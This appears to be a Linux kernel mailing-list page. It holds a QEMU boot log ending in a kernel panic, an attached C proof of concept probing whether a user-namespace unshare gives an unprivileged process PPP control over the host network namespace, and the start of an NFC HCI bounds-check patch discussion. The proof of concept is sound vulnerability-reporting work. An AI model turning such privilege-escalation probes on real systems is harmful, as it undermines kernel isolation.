[    0.000000] BIOS-e820: [gap 0x0000000100000000-0x000000fcffffffff]
[    0.000000] BIOS-e820: [mem 0x000000fd00000000-0x000000ffffffffff]  device reserved
[    0.000000] NX (Execute Disable) protection: active
[    0.000000] APIC: Static calls initialized
[    0.000000] SMBIOS 3.0.0 present.
[    0.000000] DMI: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    0.000000] DMI: Memory slots populated: 1/1
[    0.000000] tsc: Fast TSC calibration using PIT
[    0.000000] tsc: Detected 3792.994 MHz processor
[    0.005455] last_pfn = 0x3ffe0 max_arch_pfn = 0x400000000
[    0.005805] MTRR map: 4 entries (3 fixed + 1 variable; max 19), built from 8 variable MTRRs
[    0.005895] x86/PAT: Configuration [0-7]: WB  WC  UC- UC  WB  WP  UC- WT  
[    0.014429] found SMP MP-table at [mem 0x000f5480-0x000f548f]
[    0.017601] RAMDISK: [mem 0x3ff15000-0x3ffdffff]
[    0.017906] ACPI: Early table checksum verification disabled
[    0.018121] ACPI: RSDP 0x00000000000F5290 000014 (v00 BOCHS )
[    0.018272] ACPI: RSDT 0x000000003FFE1C52 000034 (v01 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.018650] ACPI: FACP 0x000000003FFE1B06 000074 (v01 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.019010] ACPI: DSDT 0x000000003FFE0040 001AC6 (v01 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.019050] ACPI: FACS 0x000000003FFE0000 000040
[    0.019078] ACPI: APIC 0x000000003FFE1B7A 000078 (v03 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.019090] ACPI: HPET 0x000000003FFE1BF2 000038 (v01 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.019101] ACPI: WAET 0x000000003FFE1C2A 000028 (v01 BOCHS  BXPC     00000001 BXPC 00000001)
[    0.019153] ACPI: Reserving FACP table memory at [mem 0x3ffe1b06-0x3ffe1b79]
[    0.019165] ACPI: Reserving DSDT table memory at [mem 0x3ffe0040-0x3ffe1b05]
[    0.019168] ACPI: Reserving FACS table memory at [mem 0x3ffe0000-0x3ffe003f]
[    0.019171] ACPI: Reserving APIC table memory at [mem 0x3ffe1b7a-0x3ffe1bf1]
[    0.019175] ACPI: Reserving HPET table memory at [mem 0x3ffe1bf2-0x3ffe1c29]
[    0.019178] ACPI: Reserving WAET table memory at [mem 0x3ffe1c2a-0x3ffe1c51]
[    0.020290] No NUMA configuration found
[    0.020302] Faking a node at [mem 0x0000000000000000-0x000000003ffdffff]
[    0.020707] NODE_DATA(0) allocated [mem 0x3ff11900-0x3ff14fff]
[    0.021163] ACPI: PM-Timer IO Port: 0x608
[    0.021362] ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])
[    0.021575] IOAPIC[0]: apic_id 0, version 32, address 0xfec00000, GSI 0-23
[    0.021639] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
[    0.021776] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)
[    0.021802] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
[    0.021848] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)
[    0.021853] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)
[    0.021963] ACPI: Using ACPI (MADT) for SMP configuration information
[    0.021985] ACPI: HPET id: 0x8086a201 base: 0xfed00000
[    0.022198] CPU topo: Max. logical packages:   1
[    0.022228] CPU topo: Max. logical nodes:      1
[    0.022234] CPU topo: Num. nodes per package:  1
[    0.022265] CPU topo: Max. logical dies:       1
[    0.022269] CPU topo: Max. dies per package:   1
[    0.022301] CPU topo: Max. threads per core:   1
[    0.022390] CPU topo: Num. cores per package:     1
[    0.022398] CPU topo: Num. threads per package:   1
[    0.022403] CPU topo: Allowing 1 present CPUs plus 0 hotplug CPUs
[    0.022831] PM: hibernation: Registered nosave memory: [mem 0x00000000-0x00000fff]
[    0.022849] PM: hibernation: Registered nosave memory: [mem 0x0009f000-0x000fffff]
[    0.022913] [gap 0x40000000-0xfffbffff] available for PCI devices
[    0.022942] Booting paravirtualized kernel on bare hardware
[    0.023091] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1910969940391419 ns
[    0.032850] Zone ranges:
[    0.032863]   DMA      [mem 0x0000000000001000-0x0000000000ffffff]
[    0.032901]   DMA32    [mem 0x0000000001000000-0x000000003ffdffff]
[    0.032906]   Normal   empty
[    0.032918] Movable zone start for each node
[    0.032932] Early memory node ranges
[    0.032949]   node   0: [mem 0x0000000000001000-0x000000000009efff]
[    0.033016]   node   0: [mem 0x0000000000100000-0x000000003ffdffff]
[    0.033083] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffdffff]
[    0.033573] On node 0, zone DMA: 1 pages in unavailable ranges
[    0.033719] On node 0, zone DMA: 97 pages in unavailable ranges
[    0.066668] On node 0, zone DMA32: 32 pages in unavailable ranges
[    0.066853] setup_percpu: NR_CPUS:64 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1
[    0.069179] percpu: Embedded 52 pages/cpu s175576 r8192 d29224 u2097152
[    0.070901] Kernel command line: console=ttyS0 rdinit=/init panic=-1
[    0.071568] printk: log buffer data + meta data: 262144 + 917504 = 1179648 bytes
[    0.071813] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes, linear)
[    0.071911] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes, linear)
[    0.074500] Fallback order for Node 0: 0 
[    0.074662] Built 1 zonelists, mobility grouping on.  Total pages: 262014
[    0.074672] Policy zone: DMA32
[    0.074799] mem auto-init: stack:all(zero), heap alloc:off, heap free:off
[    0.082635] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[    0.090001] Dynamic Preempt: lazy
[    0.094095] rcu: Preemptible hierarchical RCU implementation.
[    0.094103] rcu: 	RCU event tracing is enabled.
[    0.094117] rcu: 	RCU restricting CPUs from NR_CPUS=64 to nr_cpu_ids=1.
[    0.094201] 	Trampoline variant of Tasks RCU enabled.
[    0.094206] 	Tracing variant of Tasks RCU enabled.
[    0.094258] rcu: RCU calculated value of scheduler-enlistment delay is 100 jiffies.
[    0.094273] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1
[    0.095174] RCU Tasks: Setting shift to 0 and lim to 1 rcu_task_cb_adjust=1 rcu_task_cpu_ids=1.
[    0.110272] NR_IRQS: 4352, nr_irqs: 256, preallocated irqs: 16
[    0.115637] rcu: srcu_init: Setting srcu_struct sizes based on contention.
[    0.120260] Console: colour VGA+ 80x25
[    0.121453] printk: legacy console [ttyS0] enabled
[    0.135220] ACPI: Core revision 20251212
[    0.138632] clocksource: hpet: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604467 ns
[    0.139929] APIC: Switch to symmetric I/O mode setup
[    0.144392] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
[    0.149615] clocksource: tsc-early: mask: 0xffffffffffffffff max_cycles: 0x6d58fc573b0, max_idle_ns: 881590936876 ns
[    0.150050] Calibrating delay loop (skipped), value calculated using timer frequency.. 7585.98 BogoMIPS (lpj=3792994)
[    0.152522] Last level iTLB entries: 4KB 512, 2MB 255, 4MB 127
[    0.152657] Last level dTLB entries: 4KB 512, 2MB 255, 4MB 127, 1GB 0
[    0.152961] mitigations: Enabled attack vectors: user_kernel, user_user, SMT mitigations: auto
[    0.153340] Spectre V2 : Mitigation: Retpolines
[    0.153513] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization
[    0.153725] Spectre V2 : Spectre v2 / SpectreRSB: Filling RSB on context switch and VMEXIT
[    0.154352] x86/fpu: x87 FPU will use FXSAVE
[    0.418474] Freeing SMP alternatives memory: 56K
[    0.419136] pid_max: default: 32768 minimum: 301
[    0.424060] SELinux:  Initializing.
[    0.429842] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes, linear)
[    0.429944] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes, linear)
[    0.435955] VFS: Finished mounting rootfs on nullfs
[    0.551901] smpboot: CPU0: AMD QEMU Virtual CPU version 2.5+ (family: 0xf, model: 0x6b, stepping: 0x1)
[    0.557585] Performance Events: PMU not available due to virtualization, using software events only.
[    0.558212] signal: max sigframe size: 1440
[    0.559136] rcu: Hierarchical SRCU implementation.
[    0.559257] rcu: 	Max phase no-delay instances is 400.
[    0.561958] smp: Bringing up secondary CPUs ...
[    0.564130] smp: Brought up 1 node, 1 CPU
[    0.564279] smpboot: Total of 1 processors activated (7585.98 BogoMIPS)
[    0.569817] Memory: 983832K/1048056K available (19112K kernel code, 3002K rwdata, 7644K rodata, 2932K init, 596K bss, 60904K reserved, 0K cma-reserved)
[    0.574670] devtmpfs: initialized
[    0.580583] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1911260446275000 ns
[    0.581206] posixtimers hash table entries: 512 (order: 1, 8192 bytes, linear)
[    0.581516] futex hash table entries: 256 (16384 bytes on 1 NUMA nodes, total 16 KiB, linear).
[    0.583781] PM: RTC time: 06:57:28, date: 2026-04-09
[    0.587571] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[    0.589521] audit: initializing netlink subsys (disabled)
[    0.591100] audit: type=2000 audit(1775717847.449:1): state=initialized audit_enabled=0 res=1
[    0.593761] thermal_sys: Registered thermal governor 'step_wise'
[    0.594067] cpuidle: using governor menu
[    0.596122] PCI: Using configuration type 1 for base access
[    0.597816] kprobes: kprobe jump-optimization is enabled. All kprobes are optimized if possible.
[    0.602020] HugeTLB: registered 2.00 MiB page size, pre-allocated 0 pages
[    0.602183] HugeTLB: 28 KiB vmemmap can be freed for a 2.00 MiB page
[    0.607208] ACPI: Added _OSI(Module Device)
[    0.607316] ACPI: Added _OSI(Processor Device)
[    0.607404] ACPI: Added _OSI(Processor Aggregator Device)
[    0.631255] ACPI: 1 ACPI AML tables successfully acquired and loaded
[    0.648440] ACPI: \_SB_: platform _OSC: OS support mask [002a7eee]
[    0.653647] ACPI: Interpreter enabled
[    0.656377] ACPI: PM: (supports S0 S3 S4 S5)
[    0.656496] ACPI: Using IOAPIC for interrupt routing
[    0.656812] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug
[    0.656926] PCI: Using E820 reservations for host bridge windows
[    0.657966] ACPI: Enabled 2 GPEs in block 00 to 0F
[    0.701836] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff])
[    0.704285] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI HPX-Type3]
[    0.704523] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI]
[    0.704894] acpi PNP0A03:00: _OSC: platform retains control of PCIe features (AE_ERROR)
[    0.705299] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended configuration space under this bridge
[    0.709334] PCI host bridge to bus 0000:00
[    0.709556] pci_bus 0000:00: root bus resource [io  0x0000-0x0cf7 window]
[    0.709759] pci_bus 0000:00: root bus resource [io  0x0d00-0xffff window]
[    0.711907] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window]
[    0.712086] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfebfffff window]
[    0.712231] pci_bus 0000:00: root bus resource [mem 0x100000000-0x17fffffff window]
[    0.712460] pci_bus 0000:00: root bus resource [bus 00-ff]
[    0.713332] pci 0000:00:00.0: [8086:1237] type 00 class 0x060000 conventional PCI endpoint
[    0.719885] pci 0000:00:01.0: [8086:7000] type 00 class 0x060100 conventional PCI endpoint
[    0.722529] pci 0000:00:01.1: [8086:7010] type 00 class 0x010180 conventional PCI endpoint
[    0.723038] pci 0000:00:01.1: BAR 4 [io  0xc040-0xc04f]
[    0.723193] pci 0000:00:01.1: BAR 0 [io  0x01f0-0x01f7]: legacy IDE quirk
[    0.723336] pci 0000:00:01.1: BAR 1 [io  0x03f6]: legacy IDE quirk
[    0.723474] pci 0000:00:01.1: BAR 2 [io  0x0170-0x0177]: legacy IDE quirk
[    0.723612] pci 0000:00:01.1: BAR 3 [io  0x0376]: legacy IDE quirk
[    0.726287] pci 0000:00:01.3: [8086:7113] type 00 class 0x068000 conventional PCI endpoint
[    0.726646] pci 0000:00:01.3: quirk: [io  0x0600-0x063f] claimed by PIIX4 ACPI
[    0.726806] pci 0000:00:01.3: quirk: [io  0x0700-0x070f] claimed by PIIX4 SMB
[    0.727216] pci 0000:00:02.0: [1234:1111] type 00 class 0x030000 conventional PCI endpoint
[    0.729917] pci 0000:00:02.0: BAR 0 [mem 0xfd000000-0xfdffffff pref]
[    0.730096] pci 0000:00:02.0: BAR 2 [mem 0xfebb0000-0xfebb0fff]
[    0.730215] pci 0000:00:02.0: ROM [mem 0xfeba0000-0xfebaffff pref]
[    0.730487] pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]
[    0.731018] pci 0000:00:03.0: [8086:100e] type 00 class 0x020000 conventional PCI endpoint
[    0.731742] pci 0000:00:03.0: BAR 0 [mem 0xfeb80000-0xfeb9ffff]
[    0.731878] pci 0000:00:03.0: BAR 1 [io  0xc000-0xc03f]
[    0.733916] pci 0000:00:03.0: ROM [mem 0xfeb00000-0xfeb7ffff pref]
[    0.746347] ACPI: PCI: Interrupt link LNKA configured for IRQ 10
[    0.746999] ACPI: PCI: Interrupt link LNKB configured for IRQ 10
[    0.747436] ACPI: PCI: Interrupt link LNKC configured for IRQ 11
[    0.747848] ACPI: PCI: Interrupt link LNKD configured for IRQ 11
[    0.750066] ACPI: PCI: Interrupt link LNKS configured for IRQ 9
[    0.754143] iommu: Default domain type: Translated
[    0.754267] iommu: DMA domain TLB invalidation policy: lazy mode
[    0.755281] SCSI subsystem initialized
[    0.756351] ACPI: bus type USB registered
[    0.756697] usbcore: registered new interface driver usbfs
[    0.756991] usbcore: registered new interface driver hub
[    0.757173] usbcore: registered new device driver usb
[    0.757462] pps_core: LinuxPPS API ver. 1 registered
[    0.757566] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <giometti@linux.it>
[    0.757760] PTP clock support registered
[    0.763048] Advanced Linux Sound Architecture Driver Initialized.
[    0.771499] NetLabel: Initializing
[    0.771586] NetLabel:  domain hash size = 128
[    0.771675] NetLabel:  protocols = UNLABELED CIPSOv4 CALIPSO
[    0.772188] NetLabel:  unlabeled traffic allowed by default
[    0.780519] PCI: Using ACPI for IRQ routing
[    0.780901] e820: register RAM buffer resource [mem 0x0009fc00-0x0009ffff]
[    0.783021] e820: register RAM buffer resource [mem 0x3ffe0000-0x3fffffff]
[    0.784206] pci 0000:00:02.0: vgaarb: setting as boot VGA device
[    0.784369] pci 0000:00:02.0: vgaarb: bridge control possible
[    0.784505] pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none
[    0.784684] vgaarb: loaded
[    0.785448] hpet: 3 channels of 0 reserved for per-cpu timers
[    0.785701] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
[    0.785861] hpet0: 3 comparators, 64-bit 100.000000 MHz counter
[    0.795421] clocksource: Switched to clocksource tsc-early
[    0.797247] VFS: Disk quotas dquot_6.6.0
[    0.797438] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[    0.813762] pnp: PnP ACPI init
[    0.818683] pnp: PnP ACPI: found 6 devices
[    0.859200] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns
[    0.861802] NET: Registered PF_INET protocol family
[    0.862657] IP idents hash table entries: 16384 (order: 5, 131072 bytes, linear)
[    0.868129] tcp_listen_portaddr_hash hash table entries: 512 (order: 1, 8192 bytes, linear)
[    0.868392] Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear)
[    0.870598] TCP established hash table entries: 8192 (order: 4, 65536 bytes, linear)
[    0.870891] TCP bind hash table entries: 8192 (order: 6, 262144 bytes, linear)
[    0.871172] TCP: Hash tables configured (established 8192 bind 8192)
[    0.871712] UDP hash table entries: 512 (order: 3, 32768 bytes, linear)
[    0.871985] UDP-Lite hash table entries: 512 (order: 3, 32768 bytes, linear)
[    0.874871] NET: Registered PF_UNIX/PF_LOCAL protocol family
[    0.878312] RPC: Registered named UNIX socket transport module.
[    0.878526] RPC: Registered udp transport module.
[    0.878625] RPC: Registered tcp transport module.
[    0.878721] RPC: Registered tcp-with-tls transport module.
[    0.878828] RPC: Registered tcp NFSv4.1 backchannel transport module.
[    0.883103] pci_bus 0000:00: resource 4 [io  0x0000-0x0cf7 window]
[    0.883249] pci_bus 0000:00: resource 5 [io  0x0d00-0xffff window]
[    0.883376] pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]
[    0.885477] pci_bus 0000:00: resource 7 [mem 0x40000000-0xfebfffff window]
[    0.885619] pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]
[    0.886084] pci 0000:00:01.0: PIIX3: Enabling Passive Release
[    0.886245] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
[    0.886471] PCI: CLS 0 bytes, default 64
[    0.898609] Initialise system trusted keyrings
[    0.901468] Unpacking initramfs...
[    0.903582] workingset: timestamp_bits=56 max_order=18 bucket_order=0
[    0.911623] NFS: Registering the id_resolver key type
[    0.911945] Key type id_resolver registered
[    0.912044] Key type id_legacy registered
[    0.912168] nfs4filelayout_init: NFSv4 File Layout Driver Registering...
[    0.912460] nfs4flexfilelayout_init: NFSv4 Flexfile Layout Driver Registering...
[    0.913695] Freeing initrd memory: 812K
[    0.916665] 9p: Installing v9fs 9p2000 file system support
[    1.016482] Key type asymmetric registered
[    1.016619] Asymmetric key parser 'x509' registered
[    1.016890] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[    1.017255] io scheduler mq-deadline registered
[    1.017382] io scheduler kyber registered
[    1.021001] input: Power Button as /devices/platform/LNXPWRBN:00/input/input0
[    1.023749] ACPI: button: Power Button [PWRF]
[    1.029049] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
[    1.035147] 00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A
[    1.043450] Non-volatile memory driver v1.3
[    1.043582] Linux agpgart interface v0.103
[    1.044804] ACPI: bus type drm_connector registered
[    1.065113] loop: module loaded
[    1.073987] scsi host0: ata_piix
[    1.077567] scsi host1: ata_piix
[    1.077866] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc040 irq 14 lpm-pol 0
[    1.078033] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc048 irq 15 lpm-pol 0
[    1.081829] e100: Intel(R) PRO/100 Network Driver
[    1.081944] e100: Copyright(c) 1999-2006 Intel Corporation
[    1.082095] e1000: Intel(R) PRO/1000 Network Driver
[    1.082194] e1000: Copyright (c) 1999-2006 Intel Corporation.
[    1.229255] ata2: found unknown device (class 0)
[    1.237034] ata2.00: ATAPI: QEMU DVD-ROM, 2.5+, max UDMA/100
[    1.251715] scsi 1:0:0:0: CD-ROM            QEMU     QEMU DVD-ROM     2.5+ PQ: 0 ANSI: 5
[    1.275007] sr 1:0:0:0: [sr0] scsi3-mmc drive: 4x/4x cd/rw xa/form2 tray
[    1.275278] cdrom: Uniform CD-ROM driver Revision: 3.20
[    1.289625] ACPI: \_SB_.LNKC: Enabled at IRQ 11
[    1.296055] sr 1:0:0:0: Attached scsi generic sg0 type 5
[    1.733062] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 52:54:00:12:34:56
[    1.733476] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection
[    1.733773] e1000e: Intel(R) PRO/1000 Network Driver
[    1.733879] e1000e: Copyright(c) 1999 - 2015 Intel Corporation.
[    1.734339] sky2: driver version 1.30
[    1.734584] PPP generic driver version 2.4.2
[    1.736095] usbcore: registered new interface driver usblp
[    1.736299] usbcore: registered new interface driver usb-storage
[    1.736819] i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12
[    1.738820] serio: i8042 KBD port at 0x60,0x64 irq 1
[    1.739060] serio: i8042 AUX port at 0x60,0x64 irq 12
[    1.740386] rtc_cmos 00:05: RTC can wake from S4
[    1.742152] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
[    1.746735] rtc_cmos 00:05: registered as rtc0
[    1.747334] rtc_cmos 00:05: alarms up to one day, y3k, 242 bytes nvram, hpet irqs
[    1.749107] device-mapper: ioctl: 4.50.0-ioctl (2025-04-28) initialised: dm-devel@lists.linux.dev
[    1.749448] amd_pstate: the _CPC object is not present in SBIOS or ACPI disabled
[    1.749736] hid: raw HID events driver (C) Jiri Kosina
[    1.750724] usbcore: registered new interface driver usbhid
[    1.750850] usbhid: USB HID core driver
[    1.754469] Initializing XFRM netlink socket
[    1.754749] NET: Registered PF_INET6 protocol family
[    1.760913] Segment Routing with IPv6
[    1.761299] In-situ OAM (IOAM) with IPv6
[    1.761840] sit: IPv6, IPv4 and MPLS over IPv4 tunneling driver
[    1.763431] NET: Registered PF_PACKET protocol family
[    1.764332] 9pnet: Installing 9P2000 support
[    1.764572] Key type dns_resolver registered
[    1.765750] IPI shorthand broadcast: enabled
[    1.779393] sched_clock: Marking stable (1754019400, 24952567)->(1797996967, -19025000)
[    1.781040] registered taskstats version 1
[    1.781174] Loading compiled-in X.509 certificates
[    1.788180] Demotion targets for Node 0: null
[    1.790030] PM:   Magic number: 6:739:973
[    1.790379] netconsole: network logging started
[    1.791041] cfg80211: Loading compiled-in X.509 certificates for regulatory database
[    1.798826] kworker/u4:1 (53) used greatest stack depth: 15064 bytes left
[    1.804701] Loaded X.509 cert 'sforshee: 00b28ddf47aef9cea7'
[    1.805208] Loaded X.509 cert 'wens: 61c038651aabdcf94bd0ac7ff06c7248db18c600'
[    1.805841] ALSA device list:
[    1.805941]   No soundcards found.
[    1.806864] faux_driver regulatory: Direct firmware load for regulatory.db failed with error -2
[    1.807208] cfg80211: failed to load regulatory.db
[    1.857494] Freeing unused kernel image (initmem) memory: 2932K
[    1.857858] Write protecting the kernel read-only data: 28672k
[    1.859321] Freeing unused kernel image (text/rodata gap) memory: 1364K
[    1.859739] Freeing unused kernel image (rodata/data gap) memory: 548K
[    1.903063] tsc: Refined TSC clocksource calibration: 3792.948 MHz
[    1.903386] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x6d58a4c4524, max_idle_ns: 881590912659 ns
[    1.903659] clocksource: Switched to clocksource tsc
[    1.958248] x86/mm: Checked W+X mappings: passed, no W+X pages found.
[    1.958577] Run /init as init process
[*] initial netns ino=4026531833
[*] dropped to uid=65534 gid=65534 before userns
[*] open(/dev/ppp) before userns failed as expected: Operation not permitted
[*] after userns-only unshare netns ino=4026531833
[*] now uid=0 gid=65534 in new userns
[*] open(/dev/ppp) after userns succeeded
ioctl(PPPIOCNEWUNIT): Operation not permitted
[    2.002904] Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100
[    2.003364] CPU: 0 UID: 65534 PID: 1 Comm: init Not tainted 7.0.0-rc6-00005-g48278fa03093-dirty #3 PREEMPT(lazy) 
[    2.003572] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[    2.003846] Call Trace:
[    2.004229]  <TASK>
[    2.004380]  vpanic+0x32a/0x4b0
[    2.004617]  panic+0x5e/0x60
[    2.004685]  do_exit+0x99f/0xb40
[    2.004751]  do_group_exit+0x2b/0x80
[    2.004820]  __x64_sys_exit_group+0x13/0x20
[    2.004907]  x64_sys_call+0x12e2/0x1880
[    2.004982]  do_syscall_64+0xf1/0x530
[    2.005056]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    2.005230] RIP: 0033:0x41ac2d
[    2.005418] Code: ff ff ff 64 c7 00 26 00 00 00 eb ea 90 f3 0f 1e fa 48 c7 c6 c0 ff ff ff ba e7 00 00 00 eb 07 66 0f 1f 44 00 00 f4 89 d0 0f 05 <48> 3d 00 f0 ff ff 76 f3 f7 d8 64 89 06 eb ec 0f 1f 40 00 f3 0f 1e
[    2.005774] RSP: 002b:00007ffd9b362588 EFLAGS: 00000213 ORIG_RAX: 00000000000000e7
[    2.005926] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 000000000041ac2d
[    2.006054] RDX: 00000000000000e7 RSI: ffffffffffffffc0 RDI: 0000000000000001
[    2.006179] RBP: 000000000000fffe R08: 0000000000000000 R09: 0000000000000007
[    2.006306] R10: 000000003c6658f0 R11: 0000000000000213 R12: 0000000000487146
[    2.006439] R13: 00007ffd9b3626e8 R14: 00000000004ae868 R15: 0000000000000001
[    2.006596]  </TASK>
[    2.006901] Kernel Offset: 0x38600000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)

[-- Attachment #3: ppp_poc_init_v3.c --]
[-- Type: application/octet-stream, Size: 3036 bytes --]

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/reboot.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/if_ppp.h>
#include <linux/reboot.h>

static void die(const char *msg)
{
	perror(msg);
	fflush(stdout);
	reboot(LINUX_REBOOT_CMD_POWER_OFF);
	_exit(1);
}

static void write_file(const char *path, const char *buf)
{
	int fd = open(path, O_WRONLY);
	size_t len = strlen(buf);

	if (fd < 0)
		die(path);
	if (write(fd, buf, len) != (ssize_t)len)
		die(path);
	close(fd);
}

static unsigned long long netns_ino(void)
{
	struct stat st;

	if (stat("/proc/self/ns/net", &st) < 0)
		die("stat(/proc/self/ns/net)");
	return (unsigned long long)st.st_ino;
}

int main(void)
{
	unsigned long long before, after;
	int fd, unit = -1;

	if (mkdir("/proc", 0555) < 0 && errno != EEXIST)
		die("mkdir(/proc)");
	if (mkdir("/sys", 0555) < 0 && errno != EEXIST)
		die("mkdir(/sys)");
	if (mkdir("/dev", 0755) < 0 && errno != EEXIST)
		die("mkdir(/dev)");

	if (mount("proc", "/proc", "proc", 0, NULL) < 0)
		die("mount(proc)");
	if (mount("sysfs", "/sys", "sysfs", 0, NULL) < 0)
		die("mount(sysfs)");
	if (mount("devtmpfs", "/dev", "devtmpfs", 0, "mode=0755") < 0)
		die("mount(devtmpfs)");

	if (access("/dev/ppp", F_OK) < 0 &&
	    mknod("/dev/ppp", S_IFCHR | 0666, makedev(108, 0)) < 0 &&
	    errno != EEXIST)
		die("mknod(/dev/ppp)");
	if (chmod("/dev/ppp", 0666) < 0)
		die("chmod(/dev/ppp)");

	before = netns_ino();
	printf("[*] initial netns ino=%llu\n", before);

	if (setresgid(65534, 65534, 65534) < 0)
		die("setresgid(65534)");
	if (setresuid(65534, 65534, 65534) < 0)
		die("setresuid(65534)");
	if (prctl(PR_SET_DUMPABLE, 1) < 0)
		die("prctl(PR_SET_DUMPABLE)");

	printf("[*] dropped to uid=%d gid=%d before userns\n", getuid(), getgid());

	fd = open("/dev/ppp", O_RDWR);
	if (fd >= 0) {
		printf("[!] open(/dev/ppp) unexpectedly succeeded before userns\n");
		fflush(stdout);
		reboot(LINUX_REBOOT_CMD_POWER_OFF);
		return 1;
	}
	printf("[*] open(/dev/ppp) before userns failed as expected: %s\n",
	       strerror(errno));

	if (unshare(CLONE_NEWUSER) < 0)
		die("unshare(CLONE_NEWUSER)");
	write_file("/proc/self/uid_map", "0 65534 1\n");
	if (setresuid(0, 0, 0) < 0)
		die("setresuid(0)");

	after = netns_ino();
	printf("[*] after userns-only unshare netns ino=%llu\n", after);
	printf("[*] now uid=%d gid=%d in new userns\n", getuid(), getgid());

	fd = open("/dev/ppp", O_RDWR);
	if (fd < 0)
		die("open(/dev/ppp) after userns");
	printf("[*] open(/dev/ppp) after userns succeeded\n");

	if (ioctl(fd, PPPIOCNEWUNIT, &unit) < 0)
		die("ioctl(PPPIOCNEWUNIT)");
	printf("[+] PPPIOCNEWUNIT succeeded, unit=%d\n", unit);
	printf("[+] Unprivileged caller gained PPP admin over the inherited netns via userns-only unshare\n");
	fflush(stdout);

	reboot(LINUX_REBOOT_CMD_POWER_OFF);
	return 0;
}

^ permalink raw reply

* Re: [PATCH] nfc: hci: fix OOB heap read on short HCP frames.
From: Eric Dumazet @ 2026-04-09  7:14 UTC (permalink / raw)
  To: ashutosh desai; +Cc: netdev, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <CAKapqNnOF6BO2zE0MwNeM2_Hchp_d-qDQffywCg7Bk-pMcFKpw@mail.gmail.com>

On Wed, Apr 8, 2026 at 3:15 PM ashutosh desai
<ashutoshdesai993@gmail.com> wrote:
>
> Both nfc_hci_recv_from_llc() and nfc_hci_msg_rx_work() read byte 1 of
> an sk_buff (the HCP message header field) without first verifying the
> buffer contains at least NFC_HCI_HCP_HEADER_LEN (2) bytes.
>
> The SHDLC LLC layer only filters zero-length frames; a single-byte
> I-frame from a malicious NFC peer therefore reaches the HCI reassembly
> path where packet->message.header is read one byte past the valid data.
> The same issue is present in the NCI HCI implementation (nci/hci.c)
> via nci_hci_data_received_cb() and nci_hci_msg_rx_work().
>
> Add an explicit length check before accessing the message header at
> all four locations, freeing the skb on malformed input.
>
